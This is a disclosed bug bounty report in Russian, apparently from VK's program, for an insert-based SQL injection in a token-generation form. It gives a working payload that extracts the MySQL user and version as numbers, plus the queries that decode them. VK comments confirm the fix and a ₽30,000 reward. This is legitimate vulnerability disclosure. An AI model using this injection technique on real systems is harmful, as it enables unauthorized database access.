[
{%mask_value%}
] SQL injection insert based

  1. Заходим сюда https://
    {%mask_value%}
    /tokens
  2. Кликаем сгенерировать и вводим имя
  3. Перехватываем запрос и вставляем следующий пейлоад
 1'*CONV(HEX(SUBSTRING((SELECT user() LIMIT 1), 1, 8)), 16, 10)*1);-- -'
  1. Снова идём на https://
    {%mask_value%}
    /tokens, берём полученное число и вставляем например тут (https://www.calculator.net/scientific-notation-calculator.html), чтобы убрать 'e'
  2. С полученным числом идём сюда https://sql-academy.org/ru/sandbox и выполняем запрос
SELECT unhex(conv(*yournumber*, 10, 16));
Mysql user: SELECT unhex(conv(8030591446374774000, 10, 16));
Mysql version: SELECT unhex(conv(4048226090021826000, 10, 16));
Reward
₽30,000
Other Products
VK
Report No.: 5
Created: August 07, 08:41
Author: kedr
Status: Fixed
Type: Vulnerability
Severity:
Critical
Comments
By
p.uvarov
November 18, 2022
Благодарим вас за отчет, отправленный в Bug Bounty VK!
Мы ценим ваше время и то, что вы помогаете сделать наши веб-сервисы более безопасными.
Ваше сообщение прошло первичную проверку и было передано инженеру по безопасности.
Инженер по безопасности свяжется с вами только в том случае, если возникнут вопросы по воспроизведению ошибки или потребуется дополнительная информация от вас. Инженер будет управлять процессом исправления.
Как только ошибка будет полностью исправлена, отчет будет переведен в состояние "Исправлено", что может занять некоторое время.
By
p.uvarov
November 18, 2022
By
p.uvarov
November 21, 2022
@kedr, привет!
Мы исправили уязвимость. Пожалуйста, подтверди отсутствие.
By
p.uvarov
November 21, 2022
By
kedr
November 21, 2022
Пофикшено
By
p.uvarov
November 21, 2022
By
VK
November 22, 2022
Reward assigned: ₽30,000.00